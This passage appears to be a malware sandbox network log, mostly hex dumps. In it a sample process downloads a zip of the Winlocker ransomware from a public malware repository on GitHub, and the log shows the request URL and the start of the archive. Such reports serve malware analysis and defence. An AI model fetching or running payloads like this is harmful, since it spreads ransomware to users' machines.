                                                                                                                                                    2022-09-29 12:59:00 UTC2434INData Raw: bd e4 3e e9 4f 63 22 01 2d c1 3b 76 92 1a 58 50 43 55 35 a7 7a 03 5e a6 11 56 90 cf 03 15 80 36 77 9a e7 1e 12 ab dc 70 2b 8b cc cc 83 06 4e 04 0f fd fa 69 73 45 20 85 9c 52 e9 83 08 bb 32 42 f8 9b 00 78 e0 8e 44 2f 1a aa 2b 89 a6 ea 52 cb fa 2e 77 25 f8 f6 94 78 9c 77 fb 3a 31 43 ce 3c ce fc 44 a6 79 fd 48 28 ab e1 dd 83 9d e4 1a 09 d1 e1 3f fd 66 75 7c 7b e7 00 a8 41 46 27 89 ce ba e3 69 a1 cb 3d 5e 40 8f b0 cf 22 f0 05 a9 79 47 56 1c 69 5d 89 3c 64 95 2d 82 b4 7d 0e 85 c2 6d ba ea 70 82 16 d2 a3 89 da a8 8f 40 1d 9c a9 0c 68 77 c5 3e 73 a1 f2 b4 5e 9b 17 a2 1c 3e 7f 4a e6 5c d1 98 14 e8 ce 6d 47 cf 8c 00 f8 bf 18 16 39 65 1c bd 32 92 a2 9e ad 41 48 2f 4a bb 9d 9c 52 fa 29 a6 54 34 b2 8e 1a fd d6 4b 10 d9 0b 2d 32 63 cc b3 75 31 2b e5 05 35 c8 97 aa 62
                                                                                                                                                    Data Ascii: >Oc"-;vXPCU5z^V6wp+NisE R2BxD/+R.w%xw:1C<DyH(?fu|{AF'i=^@"yGVi]<d-}mp@hw>s^>J\mG9e2AH/JR)T4K-2cu1+5b
                                                                                                                                                    2022-09-29 12:59:00 UTC2436INData Raw: 9f ef 66 f3 94 af 4c b3 09 2d ab 0e 4e af 97 cd 23 bd 24 8a a5 9d b2 af 58 33 93 68 cb 5a ec 70 3f eb aa 56 e7 0a 29 b0 cc 2f 25 e4 e4 e7 3f de ec bb ef 17 56 22 a8 75 da 1f b2 81 d8 36 73 d5 cd 75 2c 9a dd a4 f4 cf 13 c7 34 a9 f0 12 db dd 27 fd 16 54 be 21 62 2c ac 9b a5 2e 32 d7 95 73 14 00 c0 89 f1 83 5c 1c c8 6a 6f 21 15 25 e3 b4 ea 01 97 b8 38 e2 d8 65 69 cf 54 dc 30 a2 61 40 30 18 0b 95 09 a9 97 73 47 ac a9 d3 44 fa 3d b9 51 b1 6e 24 60 3b aa c3 0a fb 9a ea fd 46 24 2b ba f5 b1 fa 71 19 22 a4 33 85 c1 bd df 8e b2 b2 55 0e 17 c8 15 1d b2 f7 a4 d1 cd ad de a1 30 a1 ae 69 f1 d2 d4 8a ef 39 e2 d2 42 91 7e 5d d3 b9 5c 95 2a c4 18 88 2c be 50 09 61 6f 9b 7e fb f1 0f 81 d6 16 ac 29 b8 17 b1 b9 a8 e5 84 50 e8 65 d1 e9 0c 6e 78 c7 61 43 fd da 20 1d 99 bd be
                                                                                                                                                    Data Ascii: fL-N#$X3hZp?V)/%?V"u6su,4'T!b,.2s\jo!%8eiT0a@0sGD=Qn$`;F$+q"3U0i9B~]\*,Pao~)PenxaC
                                                                                                                                                    2022-09-29 12:59:00 UTC2437INData Raw: aa 35 fc ed f9 c6 6c 45 53 3e 65 c2 04 79 94 18 80 5b 5c 47 94 28 b4 16 8b 92 ff f0 e4 e3 08 f2 c5 b2 05 1b 63 f1 11 da a4 07 cd 9c 5c 72 16 40 b0 88 7b 70 a8 cd fc 61 43 63 80 fd 6d 5e ab 74 50 99 9a 89 88 cb 07 73 e2 62 40 9f c6 7f 68 00 24 7e ca b7 53 8b e8 6a a6 3c e3 07 56 a3 96 a6 37 2a 66 14 a8 09 cf 0e 03 59 df 25 da 2c 2c 1a 63 fe ac 67 a3 8c e6 3b 9d 0c 8f 1d 6c 52 4a d2 6d 04 fb 63 8d 31 1a d4 6a 2f e6 e8 42 bd 26 b6 86 79 51 c3 16 07 d0 59 43 b4 0d 06 da bb a8 13 14 d3 61 06 79 2d 6d 32 12 9f 0d 0c 36 16 92 76 5f 8b 17 fa a1 76 77 40 61 e7 26 da 36 67 c0 c1 e9 8a f6 c2 43 b3 39 89 56 a0 9d 2f 69 f8 3d e6 2f 51 c4 5e a2 c7 e6 ad 6d b2 50 8b e1 0b 2e bd 49 84 b2 f0 2b ce 3d 65 13 12 d0 de 76 d3 4a d9 34 c7 5d 13 54 62 ee cb da 03 23 8c b0 2c 20
                                                                                                                                                    Data Ascii: 5lES>ey[\G(c\r@{paCcm^tPsb@h$~Sj<V7*fY%,,cg;lRJmc1j/B&yQYCay-m26v_vw@a&6gC9V/i=/Q^mP.I+=evJ4]Tb#,
                                                                                                                                                    2022-09-29 12:59:00 UTC2438INData Raw: 30 d8 57 76 4c f0 0a de 96 b8 b8 07 a3 40 fb 59 1f b7 3e 70 b5 a1 b4 9c ad bc a9 23 e6 4e 38 22 6d b6 63 da 85 56 94 1e c1 ed 8b b4 a4 0d 63 c5 db 96 7a e2 54 93 80 0f e9 3d 27 80 c3 f9 d0 6f a8 29 36 05 a1 d5 e4 a4 5b 11 3e 7a dd 31 fa 00 75 5e 5a 44 90 a2 37 e8 ea 28 63 a5 82 fd ec 53 c4 f4 af b0 ba 7e a4 d8 43 1a 68 2c 18 9a 5f bd 70 e6 c2 82 d7 03 c4 9e 3c 70 95 89 fb 0e 21 aa 7e 26 84 2a c1 29 67 4a 24 96 1c fd 9d 71 ec f0 32 35 51 04 7a 26 c1 bd 72 07 f5 a6 f6 ce 72 b6 d6 4f fd a1 42 e3 22 f0 fd 7b ab 46 67 71 9e 14 ed ae 18 f0 3f b3 31 4f d5 7c 4f 64 f3 93 b8 e1 f5 88 2a 03 b0 23 58 7c 28 5b 7c b8 5e 4b c7 ea 6f bd c2 52 ec 9e e5 e1 7e 0b 9b 6f 47 0d 4f 93 82 57 70 c8 1e c4 c1 ad f1 c6 02 3a ba 0a 1b b0 06 fb f7 66 c5 7a 02 0c bb 0d f7 5e c9 9b 9e
                                                                                                                                                    Data Ascii: 0WvL@Y>p#N8"mcVczT='o)6[>z1u^ZD7(cS~Ch,_p<p!~&*)gJ$q25Qz&rrOB"{Fgq?1O|Od*#X|([|^KoR~oGOWp:fz^
                                                                                                                                                    2022-09-29 12:59:00 UTC2439INData Raw: ce 70 1f b5 d7 1d a3 ba 82 ab 97 46 aa 94 fa 93 f8 cb 88 c8 d9 7e 2c 2c f8 02 23 c4 04 6a 85 ef 1f 1d 95 a2 ff 49 3d 3c f8 2d f0 a9 be 07 6d 9d 83 12 5a 16 65 cd fc 48 45 b6 9c 10 52 55 de 4f 31 ee e6 84 b4 b0 cd 0c ea 61 a6 9e a6 5c 87 bf 97 52 ce aa 81 ea fc 35 8a 7b 94 5b 49 9f 2e 44 ac 35 fa 69 f4 56 79 8d 46 ed 11 8d 8d 30 bb a9 2b 42 98 f0 cf 3b 50 3a d9 0d de cd f3 45 20 00 ea bf c2 ac 13 74 e4 e5 a2 64 59 da f5 ac 2c 54 9a 25 61 8c ab b4 6f a6 03 cc 44 62 ac a7 52 a0 32 d7 fe 54 de 8a 40 70 ce 82 5a 3a 66 72 e1 e0 af 25 f1 1e a8 a7 3d 53 8f ca 0f 8d f9 0a 00 03 0a 82 33 47 1c f3 0c b8 f6 2c 5d 87 87 2c 0b 9b 4a b7 2c f7 db 19 e4 fc 49 b6 8c 6e e5 d9 97 73 b9 c2 40 ef 59 94 69 72 d5 c0 2d f1 f6 4e 95 a9 82 68 55 f8 b4 d9 f7 bf 2b d4 5a 8f 20 9f b3
                                                                                                                                                    Data Ascii: pF~,,#jI=<-mZeHERUO1a\R5{[I.D5iVyF0+B;P:E tdY,T%aoDbR2T@pZ:fr%=S3G,],J,Ins@Yir-NhU+Z
                                                                                                                                                    2022-09-29 12:59:00 UTC2455INData Raw: 56 5f 9e cf 30 00 ec b8 bd 48 11 f1 69 de 65 46 a4 63 c1 c0 f7 3e 36 cd 0d c2 72 82 9e b1 a6 24 b6 d4 04 58 28 d1 b3 3d 44 16 a0 10 81 8b 0a 0c 94 0b ea 0a 41 a3 72 4b d5 d3 db b4 d9 e4 4f 25 c8 08 15 03 5d 1c 47 18 93 a1 08 d2 f7 14 19 e9 0c cf 8f fe df 0d 26 80 f7 e2 68 99 2c 54 75 bd b1 73 5e 89 aa 4a 35 70 cb 12 dc a2 38 97 2d 44 a5 0a 87 ac 48 ad 5c 41 2b be 96 70 63 cd 28 c5 38 78 4a ab 8e b3 b5 4f 19 c3 3f 46 01 d3 50 8a 23 20 e6 fe e3 0b b0 2e d1 fd 65 de a3 5b 6f 3a bb 03 88 97 30 8e 70 f5 46 f2 4d ba 0b cd 4b b4 13 68 0a 87 ae 7e 4a c7 cd 0b 1a 7a 3c a0 07 e6 e6 60 47 38 ba 4c c5 1f d3 6c 20 6f 47 ba b9 8b c5 ac f6 1c e8 7a 50 bc 52 f0 48 a5 81 27 fa 02 84 99 ab b4 f3 14 d8 3c d6 95 72 8f 46 dd b3 fa 43 41 86 ef 34 06 67 0f ae 83 4d 18 db 12 af
                                                                                                                                                    Data Ascii: V_0HieFc>6r$X(=DArKO%]G&h,Tus^J5p8-DH\A+pc(8xJO?FP# .e[o:0pFMKh~Jz<`G8Ll oGzPRH'<rFCA4gM
                                                                                                                                                    2022-09-29 12:59:00 UTC2471INData Raw: e8 e4 65 a8 fd 43 bb 6e ca 28 43 c1 da 16 5b 48 22 a8 9f 4d 14 13 dd c0 97 30 20 66 e2 fb 8b f0 33 3b 1b 63 8d 35 4d 0e 20 f5 fb 87 5c 09 4c b9 0a f3 28 a8 b1 97 53 8d 82 86 79 24 64 ad e0 11 e9 cc 71 d5 90 b0 86 4b ab dd fa 15 29 53 4b e3 91 6c 75 7d e6 fc 81 f1 20 ec c3 1e 63 b7 e0 e4 16 82 20 0a 57 ab c2 24 cb f8 ba 5f 61 fc 60 6c 10 d2 22 ea 83 d6 fa 8a cb 77 83 9e 54 4b 16 d3 bd 1f 90 fd 09 e9 8f 96 b3 90 dd e9 e4 1b ce ae 07 53 76 a7 f7 f6 a7 c2 fc e5 92 e8 dd 1e a5 53 94 84 32 c3 fd 8c 09 8e 43 ea a6 e3 70 a6 e5 c6 98 1f e8 bf 9e 57 95 af 35 67 10 e5 bd 48 ec bc 4f 01 1a 2f ef 1f f9 6e 5a af 45 56 76 42 3a 27 76 85 1f 91 34 d3 9b 2a f6 67 4a 7c dd d4 4d a9 33 79 bd a4 f2 9a 6c 30 80 fa ed 68 0a 41 52 d4 0a 7c 61 f3 c3 2a 95 97 f4 ac 9f 2f 94 1a c2
                                                                                                                                                    Data Ascii: eCn(C[H"M0 f3;c5M \L(Sy$dqK)SKlu} c W$_a`l"wTKSvS2CpW5gHO/nZEVvB:'v4*gJ|M3yl0hAR|a*/
                                                                                                                                                    2022-09-29 12:59:00 UTC2487INData Raw: 60 16 4a fd ee f3 ec 3d e0 14 8f 2b c8 0c 1c 84 cf f4 b7 99 1c 3b 73 08 d2 00 98 d3 bb 89 7a 37 dc d2 46 57 a2 ca 2a b5 6e 15 12 1e d2 a3 18 12 e5 cf 35 26 ea b0 b1 0c ef e2 b7 20 0d 5d 59 c9 86 46 54 8f b8 a3 21 47 83 a5 9f 6c db 5b fc 9d 7f 80 07 e4 74 ef 68 4f 43 2c f6 b5 f1 55 bd fb 62 72 0d df 14 dd e1 40 55 90 fe 9f 28 ff c4 36 c9 e1 19 05 aa 0a ad 45 3c 90 f2 29 04 53 15 e2 7e 94 0d 13 cf 1b a5 fb 4b c4 52 3c 19 ec e5 89 0d f9 18 f4 29 2d 86 fa d3 d6 ad 02 87 0c 21 18 89 ef 77 2e b5 2d 6f 20 96 12 75 6b 66 3e 6a a8 74 d1 d9 73 3d 4f 7d e8 11 6d a4 2c fd ec 7c 8b 7f a3 ea bf 14 df 82 a4 04 29 41 fa fa 7c f8 f1 9c fc 0d e9 26 c7 0c f2 6a 1d 6e d7 2a 8c 10 f7 fc 0c 9e 65 f1 16 a7 9a 8d df 32 29 03 2d bd 60 42 9a f1 dd 60 b7 cf 83 f5 cc f7 df 24 a6 e2
                                                                                                                                                    Data Ascii: `J=+;sz7FW*n5& ]YFT!Gl[thOC,Ubr@U(6E<)S~KR<)-!w.-o ukf>jts=O}m,|)A|&jn*e2)-`B`$
                                                                                                                                                    2022-09-29 12:59:00 UTC2503INData Raw: 74 c2 fc e1 42 fd c9 85 48 c3 70 8b 97 f7 df 97 a0 e4 b0 60 73 79 20 d3 fd 37 3c f1 00 4e a3 a0 a0 c1 dc a4 44 43 9a 19 74 fe 9d 23 07 6e 22 63 f0 2b 59 1d 99 9b 0a 3a c2 94 53 41 23 dd dd 06 81 6a fd 6b de ff c2 10 d9 27 c1 d8 55 50 e8 ad 53 90 a7 68 fd bf cd 3a 49 81 06 20 56 57 27 cc 19 44 62 08 a7 46 99 c1 35 56 16 96 b0 9f 1b db 8c 19 20 4e 07 66 17 4e bc 89 58 0c 1f 17 47 fd f1 f9 0e 0d d3 03 25 c1 38 99 89 5a 28 df 89 d0 04 d5 ea 58 d9 1e 55 ff 80 59 0f d8 a1 a4 99 6c 1a 6f 5b 40 31 3e 0f ad d2 d0 3c 82 b6 21 bf 1e 0b c5 a8 a4 be d3 15 7d c7 98 cf e9 80 5e 87 67 bc 16 3e 2f 62 80 f6 9e 41 3b 93 5d db 58 58 ea 7b c1 cd 76 1e 06 f7 32 4a 02 ee e0 29 1c 90 69 31 99 72 df c8 f9 9e 69 86 0a 75 0e 65 b7 d5 d0 b7 a9 1b de 05 be 20 49 15 27 e0 d0 1d a2 d3
                                                                                                                                                    Data Ascii: tBHp`sy 7<NDCt#n"c+Y:SA#jk'UPSh:I VW'DbF5V NfNXG%8Z(XUYlo[@1><!}^g>/bA;]XX{v2J)i1riue I'
                                                                                                                                                    2022-09-29 12:59:00 UTC2519INData Raw: fb 76 98 3d 60 51 e8 b7 63 3e a2 c6 21 e7 08 88 b4 84 54 30 6d 83 f5 3f a3 d1 31 43 a7 53 b0 f1 23 c6 86 6d b9 29 ac 55 3a d4 34 2d 56 63 de 79 ab ee 44 29 83 19 5d a4 13 c9 e4 b9 f8 5c d8 da db c2 84 b6 f7 b5 fc b1 88 b2 dd 28 fb 1d ea 6c 85 22 be d2 f1 c1 63 be b0 06 e1 a7 49 a1 b1 b9 03 c2 09 6a 02 fa db 51 1e 46 4d 2e 8a b1 29 2b 82 f7 89 de 17 2b 91 3e 7e c4 e9 de 92 3e a8 25 d4 6b 75 b9 3a 94 04 47 c1 ed 1b 1c 32 f0 6b 61 88 2b de e6 ac 9a 5a fc 8c a0 17 09 a9 dd cf b0 40 03 5a ba 0c cf 7f 62 4e 01 ed 60 41 b2 c1 e4 c7 d1 17 8a 79 cd ce 0f f7 1f 3b 40 27 e8 e4 c6 4f 5d ee 67 6f bb 89 22 38 0a ce b2 4d cc 23 b8 03 65 3b 76 73 00 98 b2 7e d1 3b ec 99 a5 a8 cb cd 0d c9 79 05 2c 72 72 23 03 ce 81 cf e3 18 81 5c 22 ce 89 4b 75 08 12 d9 ea bb 50 84 a2 03
                                                                                                                                                    Data Ascii: v=`Qc>!T0m?1CS#m)U:4-VcyD)]\(l"cIjQFM.)++>~>%ku:G2ka+Z@ZbN`Ay;@'O]go"8M#e;vs~;y,rr#\"KuP
                                                                                                                                                    2022-09-29 12:59:00 UTC2535INData Raw: cc 73 56 cb ab 35 3a 4e 13 d5 93 0f c8 7a 4a d8 8e 7f 77 4f 77 7b c5 67 15 66 b9 a2 1c ca cd e7 b4 ff 25 a1 35 69 73 13 2f 45 a5 6e e8 a3 48 fe 88 19 61 ca d4 dd dc 62 f8 80 a4 80 80 d5 75 7e 8c f1 88 75 e9 ec 07 0e 15 8c 34 dc ef b7 a2 9c 83 60 38 ee aa cb 96 8c 77 77 d5 a8 4e 8a 1e 4c f3 49 4f de 0e d7 2e c6 07 99 ef 77 f6 20 8c ba 8e b5 28 80 ff 03 53 de b3 8a 47 98 bf 8c df 01 52 34 ec 07 23 66 5e da 81 e1 ea 13 44 ca d9 45 2c 74 ce 4c 61 2d 79 51 67 d7 45 e7 ce f0 4e 70 81 fb af 1d f5 f9 45 4e e3 88 bc 31 08 db ce a6 ea 76 f5 f3 36 e2 af 83 92 31 ff 49 db 30 db 0e 21 38 b8 77 8f 0b 9d 86 ab 87 b6 9c ff f2 bc f3 22 95 32 a4 8e 09 55 79 be bc f6 a4 fb 3b 67 a8 9e 85 76 0e 6d 03 8a 5c ff c0 9e e4 7a 0c 23 22 42 f6 a2 95 e0 dd 4a 84 46 ef 31 eb e0 85 ea
                                                                                                                                                    Data Ascii: sV5:NzJwOw{gf%5is/EnHabu~u4`8wwNLIO.w (SGR4#f^DE,tLa-yQgENpEN1v61I0!8w"2Uy;gvm\z#"BJF1
                                                                                                                                                    2022-09-29 12:59:00 UTC2551INData Raw: 08 86 b9 42 95 71 31 15 40 85 43 c7 6b f3 df 62 2d 90 eb 9f 3f cc 07 bc 9f ea 03 eb 45 3e 67 9e ca f6 e4 69 9c de de 0d 51 82 ec cb da e0 11 43 f4 22 f8 c4 49 c7 59 d3 a5 24 14 7a a8 8d 1d b7 67 85 32 7d 6c 8d 9a de 10 70 4c c1 04 d5 cf 19 f3 f7 e8 85 a8 83 bb 8a 3d 14 8c 1a d9 73 f8 d2 e2 c5 a2 0f 4d 68 79 fc af c3 9f e3 c4 5d f3 90 3f b0 d1 34 ad 33 cd a1 1c 31 5c 5c 02 02 c2 fd 26 f3 e9 82 57 0c dd b2 b7 e7 47 a6 74 86 2e b4 99 22 29 25 2f ec 2a 17 01 ae 67 81 40 e8 24 dd 88 c3 8e 20 8c 56 97 f9 39 3e 31 26 b0 e9 19 b5 f5 73 02 b3 ac 04 dd 90 17 e0 63 dc 49 43 0e 57 86 b6 22 38 41 82 01 19 41 df 1a 9a 2f 22 4e 08 d3 92 8b 3e 51 2e 1d e0 b3 fc c3 21 f5 a0 3e 6b 75 49 85 3d b5 67 bf eb 18 56 14 3f 09 db 09 05 6b 0e 92 f1 fb 51 e6 da 75 89 51 80 3f ef 53
                                                                                                                                                    Data Ascii: Bq1@Ckb-?E>giQC"IY$zg2}lpL=sMhy]?431\\&WGt.")%/*g@$ V9>1&scICW"8AA/"N>Q.!>kuI=gV?kQuQ?S


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    45192.168.2.349730140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:00 UTC2554OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    46140.82.121.3443192.168.2.349730C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:00 UTC2554INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:07 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:00 UTC2555INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    47192.168.2.349731185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:00 UTC2557OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    48185.199.108.133443192.168.2.349731C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:00 UTC2557INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1654828
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "048f16ec26fac96976b1d3967107c01ab62f85a71c9ea224a0004e0d9a310bb0"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 080E:67BF:7859E0:85F3A6:63359349
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:00 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6953-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456341.515703,VS0,VE170
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 7cfa6d61708c14402141152a31d83a4870920272
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:00 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:00 UTC2558INData Raw: 50 4b 03 04 14 00 01 00 08 00 f3 be f1 48 70 46 04 a5 60 3f 19 00 a8 52 26 00 23 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 57 69 6e 6c 6f 63 6b 65 72 56 42 36 42 6c 61 63 6b 73 6f 64 2e 65 78 65 13 82 84 12 45 39 75 df 15 b3 b4 e2 21 6a 25 fe e2 9e 52 e9 6c c4 4d 37 be 49 97 0a e4 f2 fd eb 82 6d 18 d5 dc f8 b7 12 1f da 01 13 ab a0 f2 8f d0 d0 78 27 00 cb db a6 6f d4 d9 32 0a f0 dc 60 ea bc 46 55 7d 13 2c c3 9a eb 73 98 44 49 93 e0 7c 6a 2c b3 7a 58 78 41 93 99 06 42 b1 7f 75 47 eb a4 a1 79 e6 80 ed 12 91 76 8a 64 fa 6a 78 eb ca c2 0b 70 df 58 a4 d6 63 ef 69 89 6c 2f 21 e9 cc b1 31 b4 cb 54 d9 00 5f de 7a 30 fd 13 6f 15 0f 9f 11 13 bb 23 ca 41 c6 c0 64 41 22 da 3b 27 45 e9 8b 13 90 51 e3 7f 46 e2 bc 4a 84 7f 16 f7 35 b5 58 21 8e 7e 6c 9b dd 9e a3 99 c4 07
                                                                                                                                                    Data Ascii: PKHpF`?R&#Endermanch@WinlockerVB6Blacksod.exeE9u!j%RlM7Imx'o2`FU},sDI|j,zXxABuGyvdjxpXcil/!1T_z0o#AdA";'EQFJ5X!~l
                                                                                                                                                    2022-09-29 12:59:00 UTC2574INData Raw: 93 0e 8a 9d 7a 5d 41 66 e8 0c d0 8a 87 d0 c5 22 eb 81 4f c4 e6 45 13 76 43 99 57 ee c9 24 60 09 2a 38 a8 8e 6d 73 22 b5 32 d1 c2 82 53 1f e4 45 80 36 94 d6 e6 b4 3e 80 38 36 33 af 71 ea 1c 8d 3d 38 8f 15 6b 54 12 a7 dd 65 0b bb cf d4 29 6c 07 3f 71 cb 89 8c fa 9c 52 15 6e 07 76 55 9c 8b 95 81 f2 15 49 24 e5 08 f4 3b 24 26 06 7b 8c 35 92 a7 00 13 c4 fa 61 40 1c ef 2c 82 22 67 cc 7d aa b7 ba 39 c5 b2 f4 f3 d7 e5 77 2f 6e c9 7d 57 97 18 8c 3d b3 26 69 94 a4 92 77 59 59 90 ba e4 bb be f8 eb 74 6a 7d dd 8f 4f 46 d9 61 6d 60 69 a9 d0 84 e9 6d a4 63 e7 be 20 c8 84 b2 46 5a 99 df 0b b6 50 0a 37 c3 8e 25 10 2f 07 6d cb 28 09 52 94 a4 a8 6c cc 70 21 38 86 4e 3f 17 f2 1c 31 2b 96 e9 6a a8 ac 0d 3d 67 fd 61 56 3a d6 82 eb aa e6 52 80 1d 7a eb fe ef d1 34 7f 69 bd 18
                                                                                                                                                    Data Ascii: z]Af"OEvCW$`*8ms"2SE6>863q=8kTe)l?qRnvUI$;$&{5a@,"g}9w/n}W=&iwYYtj}OFam`imc FZP7%/m(Rlp!8N?1+j=gaV:Rz4i
                                                                                                                                                    2022-09-29 12:59:00 UTC2590INData Raw: f8 37 2a 1c b8 fe 86 c3 62 c1 fa 42 12 4b f0 ce a0 62 55 e6 02 3a f1 09 21 e1 90 90 1d fe 70 ae 20 5a 41 a7 11 00 46 6f bf bb 39 51 dd 4b 6d d7 7c d7 28 c4 54 af 60 41 25 a6 e7 fa 1a f6 32 a1 ee 98 e2 de a3 9d d9 da 7c 0e 1a 79 8a 0c 25 aa a7 7f 54 26 e2 72 36 b9 b4 30 91 0b b6 18 c6 7d c9 2b a3 74 eb 73 e6 93 a0 8f 2f 5b df fb 44 bc 35 33 ba d7 bd 77 4f 5a 10 0a f1 f3 88 09 32 39 fd 67 89 e2 ea 36 02 c4 27 f3 0d f2 ad 32 23 8d ae 3b 46 a6 0b 9a 8c 2b 55 ef b3 e9 c9 bd b6 a3 d3 db 1b 6c 76 3f f5 24 0a d4 46 b5 77 d3 6c 4f b7 af d1 cb a2 07 13 21 9e 23 9f ba e4 f8 9c 11 bd 11 da 65 7a a8 88 3b 86 dd 3f 4c 7a 93 aa 53 16 63 72 5d 1d 8a 9d 25 d7 99 f3 f5 b2 59 b0 51 d4 7b 24 ac 13 0d 54 d1 2a 68 6b b8 d5 32 c5 39 1e b5 48 0a ec ea 32 44 1d 1a 1e 5f 11 0a 22
                                                                                                                                                    Data Ascii: 7*bBKbU:!p ZAFo9QKm|(T`A%2|y%T&r60}+ts/[D53wOZ29g6'2#;F+Ulv?$FwlO!#ez;?LzScr]%YQ{$T*hk29H2D_"
                                                                                                                                                    2022-09-29 12:59:00 UTC2606INData Raw: 87 2f b5 2d 82 20 f5 98 f7 40 d5 a2 0c 25 a2 aa 04 7b c4 7b 58 fe 52 be 46 66 cb d4 6f a9 86 02 e7 9b d5 71 d6 6d 2b 8c 60 2c 03 92 e7 a7 6c 43 9f eb 87 59 65 fb 0f ab bc c4 67 c1 6e 8a e5 a5 ab 84 92 0d f1 62 ac 56 e5 3b 46 6d 4d f1 d7 df 7e 49 81 86 3e e0 18 f4 76 8f d0 4e 1b 6f af 69 25 07 95 b3 05 95 4a 44 d4 86 5f 44 70 9a 99 79 0d f3 ad 9e 2e 0d 9f c7 53 01 94 cc a8 03 2e c3 e0 91 59 3d 3a 72 84 3f f4 62 85 a5 79 f0 82 38 64 77 fa b9 f7 3b 11 37 d9 a3 42 e6 10 99 48 90 bf f8 85 04 e5 12 9e bc fe d2 21 5e ab 8b 7c 16 6f 2e dd ec 68 66 bd 15 4c 8f 1f d9 9e 8d 22 83 23 b3 24 03 a9 be 82 2b 1b f5 d5 a6 cb 3c ec 0e 25 76 7a ac de a9 cf 73 43 7d 0c eb 6c 80 38 c0 d2 3e b2 0d 3c 1d a5 cc 2a d1 98 77 ef aa 27 cc d1 8c 2d e5 7a 61 96 f5 04 af 26 45 83 b1 e0
                                                                                                                                                    Data Ascii: /- @%{{XRFfoqm+`,lCYegnbV;FmM~I>vNoi%JD_Dpy.S.Y=:r?by8dw;7BH!^|o.hfL"#$+<%vzsC}l8><*w'-za&E
